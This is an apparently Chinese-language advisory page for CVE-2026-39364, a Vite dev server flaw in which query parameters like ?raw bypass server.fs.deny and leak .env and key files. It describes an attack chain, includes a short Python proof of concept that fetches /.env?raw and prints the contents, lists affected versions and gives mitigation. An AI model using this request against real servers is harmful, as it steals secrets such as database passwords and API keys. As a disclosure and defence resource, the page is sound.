CVE-2026-39364 CVSS 7.5 高危

CVE-2026-39364 Vite开发服务器敏感文件泄露漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39364

漏洞类型

敏感信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Vite

漏洞概述

Vite前端工具框架在特定版本中存在安全漏洞。在Vite开发服务器运行时，攻击者可以通过在请求URL中附加特定查询参数（如?raw、?import&raw等），绕过server.fs.deny配置的文件访问限制。这使得原本被阻止的敏感文件（如.env环境变量文件、证书文件）能够通过HTTP 200响应被非法获取，导致严重的信息泄露风险。

技术细节

该漏洞源于Vite开发服务器处理特定查询参数时的逻辑缺陷。Vite配置中通常使用server.fs.deny来限制对敏感文件（如.env、.pem等）的访问。然而，在受影响版本中，当请求带有?raw、?import&raw或?import&url&inline等参数时，服务器会优先处理这些转换指令，而绕过了正常的文件系统访问控制检查（fs.deny）。攻击者无需认证，只需构造包含这些参数的URL向开发服务器发起请求，即可强制服务器返回目标敏感文件的原始内容。由于开发服务器通常在本地或内网运行，且常包含数据库密码、API密钥等高敏感信息，该漏洞可能导致开发环境被渗透。

攻击链分析

STEP 1

侦察

攻击者识别出目标运行的是受影响版本的Vite开发服务器（通常监听5173端口）。

STEP 2

利用

攻击者构造恶意URL，指向敏感文件（如/.env），并附加?raw或?import&raw等查询参数。

STEP 3

数据泄露

Vite服务器处理请求时绕过安全检查，直接返回敏感文件的原始内容（HTTP 200），攻击者获取环境变量或密钥。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Proof of Concept for CVE-2026-39364
# Target: Vite Dev Server
# Description: Bypass server.fs.deny to retrieve sensitive files using query parameters.

def exploit(target_host):
    # Example sensitive file
    sensitive_file = ".env"
    # Payload using the vulnerable query parameter
    url = f"{target_host}/{sensitive_file}?raw"
    
    try:
        response = requests.get(url)
        if response.status_code == 200:
            print(f"[+] Vulnerability Confirmed!")
            print(f"[+] Content of {sensitive_file}:")
            print(response.text)
        else:
            print(f"[-] Exploit failed. Status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

# Usage
# exploit("http://localhost:5173")

影响范围

Vite >= 7.1.0, < 7.3.2

Vite >= 8.0.0, < 8.0.5

防御指南

临时缓解措施

在无法立即升级的情况下，严格限制对Vite开发服务器端口的网络访问，仅允许受信任的内部IP地址连接，并确保server.fs.deny配置正确（尽管当前版本该配置可能失效，但网络隔离是有效的临时屏障）。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表